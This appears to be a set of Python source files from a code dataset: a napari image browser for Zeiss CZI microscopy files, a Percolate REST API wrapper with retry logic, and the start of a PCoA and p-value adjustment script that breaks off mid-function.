self.mdtable.setRowCount(row_count)\n\n row = 0\n\n # update the table with the entries from metadata dictionary\n for key, value in metadata.items():\n newkey = QTableWidgetItem(key)\n self.mdtable.setItem(row, 0, newkey)\n newvalue = QTableWidgetItem(str(value))\n self.mdtable.setItem(row, 1, newvalue)\n row += 1\n\n # fit columns to content\n self.mdtable.resizeColumnsToContents()\n\n def update_style(self):\n\n # define font size and type\n fnt = QFont()\n fnt.setPointSize(11)\n fnt.setBold(True)\n fnt.setFamily('Arial')\n\n # update both header items\n item1 = QtWidgets.QTableWidgetItem('Parameter')\n item1.setForeground(QtGui.QColor(25, 25, 25))\n item1.setFont(fnt)\n self.mdtable.setHorizontalHeaderItem(0, item1)\n\n item2 = QtWidgets.QTableWidgetItem('Value')\n item2.setForeground(QtGui.QColor(25, 25, 25))\n item2.setFont(fnt)\n self.mdtable.setHorizontalHeaderItem(1, item2)\n\n\nclass FileTree(QWidget):\n\n def __init__(self, defaultfolder):\n super(QWidget, self).__init__()\n\n name_filters = ['*.czi', '*.ome.tiff', '*ome.tif', '*.tiff', '*.tif']\n\n # define the style for the FileTree via a style sheet\n self.setStyleSheet(\"\"\"\n QTreeView::item {\n background-color: rgb(38, 41, 48);\n font-weight: bold;\n }\n\n QTreeView::item::selected {\n background-color: rgb(38, 41, 48);\n color: rgb(0, 255, 0);\n\n }\n\n QTreeView QHeaderView:section {\n background-color: rgb(38, 41, 48);\n color: rgb(255, 255, 255);\n }\n \"\"\")\n\n self.model = QFileSystemModel()\n self.model.setRootPath(defaultfolder)\n self.model.setFilter(QtCore.QDir.AllDirs | QDir.Files | QtCore.QDir.NoDotAndDotDot)\n self.model.setNameFilterDisables(False)\n self.model.setNameFilters(name_filters)\n\n self.tree = QTreeView()\n self.tree.setModel(self.model)\n self.tree.setRootIndex(self.model.index(defaultfolder))\n self.tree.setAnimated(True)\n self.tree.setIndentation(20)\n self.tree.setSortingEnabled(False)\n header = self.tree.header()\n header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)\n\n windowLayout = QVBoxLayout()\n windowLayout.addWidget(self.tree)\n self.setLayout(windowLayout)\n\n self.tree.clicked.connect(self.on_treeView_clicked)\n\n @pyqtSlot()\n def on_treeView_clicked(self, index):\n indexItem =
self.model.index(index.row(), 0, index.parent())\n filename = self.model.fileName(indexItem)\n filepath = self.model.filePath(indexItem)\n\n # open the file when clicked\n print('Opening ImageFile : ', filepath)\n open_image_stack(filepath)\n\n\nclass OptionsWidget(QWidget):\n\n def __init__(self):\n super(QWidget, self).__init__()\n\n # Create a grid layout instance\n self.grid_opt = QGridLayout()\n self.grid_opt.setSpacing(10)\n self.setLayout(self.grid_opt)\n\n # add checkbox to use Dask Delayed reader to the grid layout\n self.cbox_dask = QCheckBox(\"Use AICSImageIO Dask Reader\", self)\n self.cbox_dask.setChecked(True)\n self.cbox_dask.setStyleSheet(\"font:bold;\"\n \"font-size: 10px;\"\n \"width :14px;\"\n \"height :14px;\"\n )\n self.grid_opt.addWidget(self.cbox_dask, 0, 0)\n\n # add checkbox to open CZI after the experiment execution\n self.cbox_openczi = QCheckBox(\"Open CZI after Acquisition\", self)\n self.cbox_openczi.setChecked(True)\n self.cbox_openczi.setStyleSheet(\"font:bold;\"\n \"font-size: 10px;\"\n \"width :14px;\"\n \"height :14px;\"\n )\n self.grid_opt.addWidget(self.cbox_openczi, 1, 0)\n\n\nclass FileBrowser(QWidget):\n\n def __init__(self, defaultfolder=r'c:\\Zen_Output'):\n super(QWidget, self).__init__()\n self.layout = QHBoxLayout(self)\n self.file_dialog = QFileDialog()\n self.file_dialog.setWindowFlags(Qt.Widget)\n self.file_dialog.setModal(False)\n self.file_dialog.setOption(QFileDialog.DontUseNativeDialog)\n self.file_dialog.setDirectory(defaultfolder)\n\n # remove open and cancel button from widget\n self.buttonBox = self.file_dialog.findChild(QDialogButtonBox, \"buttonBox\")\n self.buttonBox.clear()\n\n # only show the following file types\n self.file_dialog.setNameFilter(\"Images (*.czi *.ome.tiff *ome.tif *.tiff *.tif)\")\n self.layout.addWidget(self.file_dialog)\n self.file_dialog.currentChanged.connect(open_image_stack)\n\n\nclass StartExperiment(QWidget):\n\n def __init__(self, default_cziname='myimage.czi'):\n super(QWidget, self).__init__()\n\n # Create a grid layout instance\n self.grid_exp = QGridLayout()\n self.grid_exp.setSpacing(10)\n self.setLayout(self.grid_exp)\n\n # add widgets to the grid layout\n self.expselect = QComboBox(self)\n self.expselect.addItems(expfiles_short)\n self.expselect.setStyleSheet(\"font: bold;\"\n \"font-size: 10px;\"\n )\n self.grid_exp.addWidget(self.expselect, 0, 0)\n\n self.startexpbutton = QPushButton('Run Experiment')\n self.startexpbutton.setStyleSheet(\"font: bold;\"\n # \"background-color: red;\"\n \"font-size: 10px;\"\n # \"height: 48px;width: 120px;\"\n )\n self.grid_exp.addWidget(self.startexpbutton, 0, 1)\n\n self.namelabel = QLabel(self)\n self.namelabel.setText('Save Experiment result as CZI :')\n self.namelabel.setStyleSheet(\"font: bold;\"\n \"font-size: 10px;\"\n \"\"\n )\n self.grid_exp.addWidget(self.namelabel, 1, 0)\n\n self.nameedit = QLineEdit(self)\n self.nameedit.setText(default_cziname)\n self.nameedit.setFixedWidth(200)\n self.nameedit.setStyleSheet(\"font: bold;\"\n \"font-size: 10px;\"\n )\n self.grid_exp.addWidget(self.nameedit, 1, 1)\n\n # Set the layout on the application's window\n self.startexpbutton.clicked.connect(self.on_click)\n\n @pyqtSlot()\n def on_click(self):\n\n # get name of the selected experiment\n current_exp = self.expselect.currentText()\n print('Selected ZEN Experiment : ', current_exp)\n\n # get the desired savename\n desired_cziname = self.nameedit.text()\n\n # disable the button while the experiment is running\n self.startexpbutton.setEnabled(False)\n 
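# change the button label as immediate feedback that the acquisition is running\n 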
self.startexpbutton.setText('Running ...')\n\n # not nice, but this \"redraws\" the button\n # QtCore.QApplication.processEvents()\n QtWidgets.QApplication.processEvents()\n\n # initialize the experiment with parameters\n czexp = ZenExperiment(experiment=current_exp,\n savefolder=savefolder,\n cziname=desired_cziname)\n\n # start the actual experiment\n self.saved_czifilepath = czexp.startexperiment()\n print('Saved CZI : ', self.saved_czifilepath)\n\n # enable the button again when experiment is over\n self.startexpbutton.setEnabled(True)\n self.startexpbutton.setText('Run Experiment')\n\n # not nice, but this \"redraws\" the button\n QtWidgets.QApplication.processEvents()\n\n # option to use Dask Delayed reader\n use_dask = checkboxes.cbox_dask.isChecked()\n print(\"Use Dask Reader : \", use_dask)\n\n # open the just acquired CZI and show it inside napari viewer\n if self.saved_czifilepath is not None:\n open_image_stack(self.saved_czifilepath, use_dask)\n\n\ndef open_image_stack(filepath, use_dask=False):\n \"\"\" Open a file using AICSImageIO and display it using napari\n\n :param filepath: filepath of the image\n :type filepath: str\n :param use_dask: use Dask Delayed reader, defaults to False\n :type use_dask: bool, optional\n \"\"\"\n\n if os.path.isfile(filepath):\n\n # remove existing layers from napari\n viewer.layers.select_all()\n viewer.layers.remove_selected()\n\n # get the metadata\n metadata, add_metadata = imf.get_metadata(filepath)\n\n # add the metadata and adapt the table display\n mdbrowser.update_metadata(metadata)\n mdbrowser.update_style()\n\n # get AICSImageIO object\n img = AICSImage(filepath)\n\n if use_dask:\n stack = img.get_image_dask_data()\n else:\n stack = img.get_image_data()\n\n # add the image stack to the napari viewer\n show_image_napari(stack, metadata,\n blending='additive',\n gamma=0.85,\n rename_sliders=True)\n\n\ndef show_image_napari(array, metadata,\n blending='additive',\n gamma=0.75,\n rename_sliders=False):\n \"\"\"Show the multidimensional array using the napari viewer\n\n :param array: multidimensional NumPy.Array containing the pixeldata\n :type array: NumPy.Array\n :param metadata: dictionary with CZI or OME-TIFF metadata\n :type metadata: dict\n :param blending: napari viewer option for blending, defaults to 'additive'\n :type blending: str, optional\n :param gamma: napari viewer value for Gamma, defaults to 0.75\n :type gamma: float, optional\n :param rename_sliders: name slider with correct labels, defaults to False\n :type rename_sliders: bool, optional\n \"\"\"\n\n # create scalefactor list with all ones\n scalefactors = [1.0] * len(array.shape)\n dimpos = imf.get_dimpositions(metadata['Axes_aics'])\n\n # get the scalefactors from the metadata\n scalef = imf.get_scalefactor(metadata)\n\n # modify the tuple for the scales for napari\n scalefactors[dimpos['Z']] = scalef['zx']\n\n # remove C dimension from scalefactor\n scalefactors_ch = scalefactors.copy()\n del scalefactors_ch[dimpos['C']]\n\n if metadata['SizeC'] > 1:\n # add all channels as layers\n for ch in range(metadata['SizeC']):\n\n try:\n # get the channel name\n chname = metadata['Channels'][ch]\n except KeyError as e:\n print(e)\n # or use CH1 etc.
 as string for the name\n chname = 'CH' + str(ch + 1)\n\n # cut out channel\n # use dask if array is a dask.array\n if isinstance(array, da.Array):\n print('Extract Channel as Dask.Array')\n channel = array.compute().take(ch, axis=dimpos['C'])\n\n else:\n # use normal numpy if not\n print('Extract Channel as NumPy.Array')\n channel = array.take(ch, axis=dimpos['C'])\n\n # actually show the image array\n print('Adding Channel : ', chname)\n print('Shape Channel : ', ch, channel.shape)\n print('Scaling Factors : ', scalefactors_ch)\n\n # get min-max values for initial scaling\n clim = imf.calc_scaling(channel,\n corr_min=1.0,\n offset_min=0,\n corr_max=0.85,\n offset_max=0)\n\n # add channel to napari viewer\n viewer.add_image(channel,\n name=chname,\n scale=scalefactors_ch,\n contrast_limits=clim,\n blending=blending,\n gamma=gamma)\n\n if metadata['SizeC'] == 1:\n\n # just add one channel as a layer\n try:\n # get the channel name\n chname = metadata['Channels'][0]\n except KeyError:\n # or use CH1 as string for the name\n chname = 'CH1'\n\n # actually show the image array\n print('Adding Channel: ', chname)\n print('Scaling Factors: ', scalefactors)\n\n # use dask if array is a dask.array\n if isinstance(array, da.Array):\n print('Extract Channel using Dask.Array')\n array = array.compute()\n\n # get min-max values for initial scaling\n clim = imf.calc_scaling(array)\n\n viewer.add_image(array,\n name=chname,\n scale=scalefactors,\n contrast_limits=clim,\n blending=blending,\n gamma=gamma)\n\n if rename_sliders:\n\n print('Renaming the Sliders based on the Dimension String ....')\n\n if metadata['SizeC'] == 1:\n\n # get the position of the dimension entries (single channel, nothing to remove)\n dimpos_viewer = imf.get_dimpositions(metadata['Axes_aics'])\n\n # get the label of the sliders\n sliders = viewer.dims.axis_labels\n\n # update the labels with the correct dimension strings\n slidernames = ['B', 'S', 'T', 'Z', 'C']\n\n if metadata['SizeC'] > 1:\n\n new_dimstring = metadata['Axes_aics'].replace('C', '')\n\n # get the position of dimension entries after removing C dimension\n dimpos_viewer = imf.get_dimpositions(new_dimstring)\n\n # get the label of the sliders\n # for napari <= 0.4.2 this returns a list\n # and >= 0.4.3 it will return a tuple\n sliders = viewer.dims.axis_labels\n\n # update the labels with the correct dimension strings\n slidernames = ['B', 'S', 'T', 'Z']\n\n for s in slidernames:\n if dimpos_viewer[s] >= 0:\n try:\n # this seems to work for napari <= 0.4.2\n\n # assign the dimension labels\n sliders[dimpos_viewer[s]] = s\n except TypeError:\n # this works for napari >= 0.4.3\n\n # convert to list()\n tmp_sliders = list(sliders)\n\n # assign the dimension labels\n tmp_sliders[dimpos_viewer[s]] = s\n\n # convert back to tuple\n sliders = tuple(tmp_sliders)\n\n # apply the new labels to the viewer\n viewer.dims.axis_labels = sliders\n\n\ndef get_zenfolders(zen_subfolder='Experiment Setups'):\n \"\"\"Get the absolute path for a specific ZEN folder.\n\n :param zen_subfolder: Name of a specific subfolder, defaults to 'Experiment Setups'\n :type zen_subfolder: str, optional\n :return: specific zensubfolder path\n :rtype: str\n \"\"\"\n\n zenfolder = None\n zensubfolder = None\n\n # get the user folder\n userhome = str(Path.home())\n\n # construct the Zen Document folder and check\n zenfolder = os.path.join(userhome, r'Documents\\Carl Zeiss\\ZEN\\Documents')\n\n if os.path.isdir(zenfolder):\n zensubfolder = os.path.join(zenfolder, zen_subfolder)\n if not
 os.path.isdir(zenfolder):\n print('ZEN Folder: ' + zenfolder + ' not found')\n\n return zensubfolder\n\n\n###########################################################\n\nif __name__ == \"__main__\":\n\n # make sure this location is correct if you specify this\n savefolder = r'C:\\Users\\m1srh\\Documents\\Zen_Output'\n if os.path.isdir(savefolder):\n print('SaveFolder : ', savefolder, 'found.')\n else:\n print('SaveFolder : ', savefolder, 'not found.')\n\n # specify directly or try to discover folder automatically\n #zenexpfolder = r'c:\\Users\\testuser\\Documents\\Carl Zeiss\\ZEN\\Documents\\Experiment Setups'\n zenexpfolder = get_zenfolders(zen_subfolder='Experiment Setups')\n\n # check if the ZEN experiment folder was found\n if zenexpfolder is not None:\n print('ZEN Experiment Setups Folder : ', zenexpfolder, 'found.')\n # get lists with existing experiment files\n expdocs = ZenDocuments()\n expfiles_long, expfiles_short = expdocs.getfilenames(folder=zenexpfolder,\n pattern='*.czexp')\n\n if zenexpfolder is None:\n expfiles_long = []\n expfiles_short = []\n\n # default for saving a CZI image after acquisition\n default_cziname = 'myimage.czi'\n\n # decide what widget to use - 'tree' or 'dialog'\n fileselect = 'dialog'\n\n # start the main application\n with napari.gui_qt():\n\n # define the parent directory\n # when using the FileTree one cannot navigate to higher levels\n print('Image Directory : ', savefolder)\n\n # create the napari viewer\n viewer = napari.Viewer()\n\n if fileselect == 'tree':\n # add a FileTree widget\n filetree = FileTree(defaultfolder=savefolder)\n fbwidget = viewer.window.add_dock_widget(filetree, name='filebrowser', area='right')\n\n if fileselect == 'dialog':\n # add a FileDialog widget\n filebrowser = FileBrowser(defaultfolder=savefolder)\n fbwidget = viewer.window.add_dock_widget(filebrowser, name='filebrowser', area='right')\n\n # create the widget elements\n mdbrowser = TableWidget()\n checkboxes = OptionsWidget()\n expselect = StartExperiment(default_cziname=default_cziname)\n\n # add widget to activate the dask delayed reading\n cbwidget = viewer.window.add_dock_widget(checkboxes, name='checkbox', area='bottom')\n\n # add the Table widget for the metadata\n mdwidget = viewer.window.add_dock_widget(mdbrowser, name='mdbrowser', area='right')\n\n # add the Experiment Selector widget\n expwidget = viewer.window.add_dock_widget(expselect, name='expselect', area='bottom')\n","sub_path":"napari_browser_cz.py","file_name":"napari_browser_cz.py","file_ext":"py","file_size_in_byte":20104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"422227784","text":"import json\nimport logging\nimport os\nimport socket\nimport sys\nimport time\nimport unicodedata\nfrom pprint import pprint\nimport requests\nfrom requests.exceptions import HTTPError\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse as dt_parse\nfrom google.cloud import bigquery\n\n\nclass PercolateAPIError(Exception):\n    pass\n\n\ndef count_calls(fn):\n    def wrapper(*args, **kwargs):\n        wrapper.calls += 1\n        return fn(*args, **kwargs)\n    wrapper.calls = 0\n    wrapper.__name__ = fn.__name__\n    return wrapper\n\n\ndef relative_insert(path):\n    \"\"\"\n    Insert a relative path into sys path.\n    \"\"\"\n    abspath = os.path.abspath(os.path.join(os.path.dirname(__file__), path))\n    sys.path.insert(0, abspath)\n\n\nPERC_HEADERS = {'Content-Type': 'application/json'}\nPERCOLATE_BASE_URL = os.environ.get(\n
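# an environment override is checked first; the public endpoint below is the fallback\n 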
\"PERCOLATE_BASE_URL\") or 'https://percolate.com/api'\n\n\ndef get_user_id_from_api_key(api_key):\n json_data = get_object(api_key, '/v5/me')\n d = json_data['data']\n return get_id_from_uid(d['id'])\n\n\ndef get_all_objects(api_key, url, params=None, page_limit=100):\n \"\"\"\n Wrapper for pagination of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n params -- dictionary of URL encoded parameters\n \"\"\"\n if params is None or not isinstance(params, dict):\n params = {}\n result = []\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n\n completed = False\n while not completed:\n offset = 0\n limit = page_limit\n total = page_limit\n # page through\n while offset < total:\n url_params = {'limit': limit, 'offset': offset}\n url_params.update(params)\n\n json_data = get_object(api_key, url, url_params)\n try:\n total = json_data['pagination']['total']\n except KeyError:\n total = json_data['meta']['total']\n\n if json_data:\n result.extend(json_data['data'])\n\n offset += limit\n if offset >= total:\n completed = True\n return result\n\n\n@count_calls\ndef get_object(api_key, url, params=None):\n \"\"\"\n Wrapper for single object GET of Percolate API (no pagination)\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n params -- dictionary of URL encoded parameters\n \"\"\"\n if not params:\n params = {}\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n url_params = {}\n url_params.update(params)\n\n retry = 0\n while retry < 10:\n try:\n response = requests.get(api_url, params=url_params,\n headers=headers, timeout=60)\n response.raise_for_status()\n result = response.json()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n # api_url + urllib.urlencode(url_params),\n # headers=headers, deadline=None\n # )\n # result = json.loads(response.content)\n if response.status_code != 503:\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n url_params, headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if 'errors' in result:\n raise PercolateAPIError(result, api_url, url_params, headers)\n return result\n\n\n@count_calls\ndef get_asset_download_url(api_key, asset_uid):\n url = 'https://percolate.com/pam/api/v5/asset/{}/download'\n headers = {'Content-Type': 'application/json', 'Authorization': api_key}\n # params = {'disposition': 'inline'}\n params = {}\n response = None\n\n retry = 0\n while retry < 10:\n try:\n response = requests.get(url.format(asset_uid), params=params,\n headers=headers, allow_redirects=False)\n response.raise_for_status()\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if 
status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(\n status_code, asset_uid, headers, params)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry == 9:\n print(response.text)\n raise\n time.sleep(1)\n retry += 1\n\n download_url = response.headers['Location']\n return download_url\n\n\ndef get_id_from_uid(uid):\n \"\"\"\n Returns numeric ID of an object from its unique ID\n Example: license:12345 returns 12345\n\n Keyword Arguments:\n uid -- Unique object ID\n \"\"\"\n return uid.split(':', 1)[1]\n\n\ndef upload_asset(api_key, url, scope_uid, folder_uid='folder:primary'):\n \"\"\"\n Uploads URL asset into Percolate\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- URL of asset to upload\n scope_uid -- UID of the scope of the asset (license, brand, account)\n \"\"\"\n data = {\n 'type': 'url',\n 'destination_id': folder_uid,\n 'scope_id': scope_uid,\n 'ext': {'url': url},\n 'upload_state': 'preparing'\n }\n # Kick off the upload\n result = post_object(api_key, '/v5/upload/', data)\n # Send back the upload UID for polling\n upload_id = result['id']\n asset_uid, is_dupe = _check_asset_upload_status(api_key, upload_id)\n return asset_uid, upload_id, is_dupe\n\n\ndef _check_asset_upload_status(api_key, upload_uid, give_up_seconds=0):\n \"\"\"\n Returns status checks of uploads into Percolate\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n upload_uid -- Upload UID\n give_up_seconds -- seconds to wait for response if not ready\n \"\"\"\n give_up = False\n give_up_at = time.time()\n asset_id = None\n if give_up_seconds > 0:\n give_up = True\n give_up_at = time.time() + give_up_seconds\n status = ''\n is_dupe = False\n while status not in ('ready',):\n # logging.debug(\"Checking status of upload {}...\".format(upload_uid))\n # Poll the endpoint\n response = get_object(api_key, '/v5/upload/' + upload_uid)\n status = response['data']['status']\n if status in ('ready', 'complete', 'duplicate'):\n asset_id = response['data']['asset_id']\n if status == 'duplicate':\n is_dupe = True\n if asset_id is not None:\n break\n elif status == 'error':\n raise PercolateAPIError('Error creating asset from upload.')\n else:\n if give_up and time.time() > give_up_at:\n logging.warning(\"Giving up...\")\n return asset_id, is_dupe\n else:\n logging.debug(\"Asset not ready. 
Waiting 3 seconds...\")\n time.sleep(3)\n\n logging.debug(\"Upload {} Asset ready: {}\".format(upload_uid, asset_id))\n return asset_id, is_dupe\n\n\n@count_calls\ndef post_object(api_key, url, data=None, verbose=False):\n \"\"\"\n Wrapper for POST Calls of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n data -- dictionary of payload data\n \"\"\"\n if not data:\n data = {}\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n response = None\n\n retry = 0\n while retry < 10:\n try:\n if verbose:\n print(api_url)\n print(json.dumps(data, sort_keys=True, indent=4))\n pprint(headers)\n response = requests.post(api_url, data=json.dumps(data),\n headers=headers, timeout=60)\n result = response.json()\n response.raise_for_status()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n #     api_url,\n #     method='post',\n #     headers=headers, deadline=None,\n #     payload=json.dumps(data)\n # )\n # result = json.loads(response.content)\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n\n except json.decoder.JSONDecodeError as json_error:\n # a JSONDecodeError carries no HTTP response; use the response we just received\n error_status_code = response.status_code\n if isinstance(error_status_code, int) and error_status_code == 502:\n continue\n print('JSON error: {}'.format(json_error))\n status_code = response.status_code\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry > 0:\n # TODO - Count retries\n # count_calls()\n\n pass\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if 'errors' in result:\n print(response.request.body)\n raise PercolateAPIError(result, api_url, data, headers)\n if 'data' in result:\n return result['data']\n return result\n\n\n@count_calls\ndef delete_object(api_key, url):\n \"\"\"\n Wrapper for DELETE Calls of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n \"\"\"\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n response = None\n\n retry = 0\n while retry < 10:\n try:\n response = requests.delete(api_url, headers=headers, timeout=60)\n result = response.status_code\n response.raise_for_status()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n #     api_url,\n #     method='post',\n #     headers=headers, deadline=None,\n #     payload=json.dumps(data)\n # )\n # result = json.loads(response.content)\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params,
headers))\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps({}), headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry > 0:\n # TODO - Count retries\n # count_calls()\n\n pass\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if result != 204:\n print(response.request.body)\n raise PercolateAPIError(result, api_url, headers)\n return True\n\n\n@count_calls\ndef put_object(api_key, url, data=None):\n \"\"\"\n Wrapper for PUT Calls of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n data -- dictionary of payload data\n \"\"\"\n if not data:\n data = {}\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n\n retry = 0\n while retry < 10:\n try:\n response = requests.put(api_url, data=json.dumps(data),\n headers=headers, timeout=60)\n result = response.json()\n response.raise_for_status()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n # api_url,\n # method='put',\n # headers=headers, deadline=None,\n # payload=json.dumps(data)\n # )\n # result = json.loads(response.content)\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n except json.decoder.JSONDecodeError as json_error:\n print('JSON error: {}'.format(json_error))\n status_code = response.status_code\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if 'errors' in result:\n raise PercolateAPIError(result, api_url, data, headers)\n return result\n\n\ndef get_all_files(root_directory, with_dotfiles=False, full_path=False,\n has_file_ext=True):\n all_files = []\n # strip_dir = root_directory.rstrip('/')\n for root, dirs, file_names in os.walk(root_directory):\n if not with_dotfiles:\n file_names = [f for f in file_names if not f[0] == '.']\n dirs[:] = [d for d in dirs if not d[0] == '.']\n for f in file_names:\n result = f\n if not has_file_ext:\n result = os.path.splitext(result)[0]\n if full_path:\n result = os.path.join(root, result)\n all_files.append(unicodedata.normalize('NFC', result))\n return all_files\n\n\ndef get_root_folder_id(api_key, license_uid):\n data = {'ids': 'folder:primary', 'scope_ids': license_uid}\n api_url = '/v5/folder/'\n raw_root_details = get_object(api_key, api_url, data)\n return raw_root_details['data'][0]['id']\n\n\ndef _get_license_timezone(api_key, license_uid):\n url = '/v5/license/{}'.format(license_uid)\n license_obj = get_object(api_key, url)['data']\n return license_obj['timezone']\n\n\ndef update_status(api_key, post_obj, status, url=None, live_at='now'):\n post_id = post_obj['id']\n field_list = ['topic_ids', 'term_ids', 'ext', 'description', 'name',\n 'status']\n new_post_obj = {}\n for field in 
field_list:\n new_post_obj[field] = post_obj[field]\n\n if live_at == 'now':\n live_at_obj = datetime.utcnow() + timedelta(seconds=5)\n elif live_at is None:\n live_at_obj = None\n elif not isinstance(live_at, datetime):\n live_at_obj = dt_parse(live_at)\n else:\n live_at_obj = live_at\n\n new_post_obj['live_at'] = live_at_obj.strftime('%Y-%m-%dT%H:%M:%S.000Z') \\\n if live_at_obj else None\n if live_at:\n timezone = _get_license_timezone(api_key, post_obj['scope_id'])\n new_post_obj['live_at_timezone'] = timezone\n new_post_obj['status'] = status\n new_post_obj['url'] = url\n api_url = '/v5/post/{}'.format(post_id)\n\n result = put_object(api_key, api_url, data=new_post_obj)\n return result\n\n # pprint(new_post_obj)\n\n","sub_path":"ts_utils.py","file_name":"ts_utils.py","file_ext":"py","file_size_in_byte":17978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"530692821","text":"##import sys\n##print(sys.path)\n## above import is to check where the \"import\" command is looking\nimport pandas as pd\nfrom scipy.stats import spearmanr\nimport argparse\nimport numpy as np\n\n#TODO: implement use with categorical metadata labels\n#TODO: for continuous data allow pearson correlation/use correl_method arg\n#TODO: for continuous data sort correls\n\ndef read_pc(pc_fp, min_percent_explained):\n    f = open(pc_fp)\n    f = f.readlines()\n    f = [i.strip().split('\\t') for i in f]\n\n    eig_index = -1\n    eigvals = None\n    percent_explained_line = -1\n    percent_explained = None\n    pc_start = -1\n    pc_end = -1\n    pcs = None\n    for index, line in enumerate(f):\n        if line == ['']:\n            continue\n        elif line[0] == \"Eigvals\":\n            eig_index = index + 1\n        elif index == eig_index:\n            eigvals = line\n        elif line[0] == \"Proportion explained\":\n            percent_explained_line = index + 1\n        elif index == percent_explained_line:\n            percent_explained = [float(i) for i in line]\n        elif line[0] == \"Site\":\n            pc_start = index + 1\n            pc_end = pc_start + int(line[1])\n            pcs = pd.DataFrame(dtype=float)\n        elif index >= pc_start and index < pc_end:\n            pcs[line[0]] = [float(i) for i in line[1:]]\n        else:\n            continue\n    pcs = pcs.transpose()\n\n    # get rid of zeroes\n    not_zeroes = pcs.columns[pcs.sum() != 0]\n    pcs = pcs[not_zeroes]\n    percent_explained = percent_explained[:len(not_zeroes)]\n\n    # filter by percent explained\n    last_percent_explained = None\n    for index, value in enumerate(percent_explained):\n        if value < min_percent_explained:\n            last_percent_explained = index-1\n            break\n    percent_explained = percent_explained[:last_percent_explained]\n    pcs = pcs[pcs.columns[:last_percent_explained]]\n    pcs.columns = [\"PC\"+str(i+1) for i in pcs.columns]\n\n    return pcs\n\n\ndef bh_adjust(pvalues):\n    \"\"\"benjamini-hochberg p-value adjustment stolen from\n    http://stackoverflow.com/questions/7450957/how-to-implement-rs-p-adjust-in-python\n    \"\"\"\n    pvalues = np.array(pvalues)\n    n = float(pvalues.shape[0])\n    new_pvalues = np.empty(int(n))\n    values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n    values.sort()\n    values.reverse()\n    new_values = []\n    for i, vals in enumerate(values):\n        rank = n - i\n        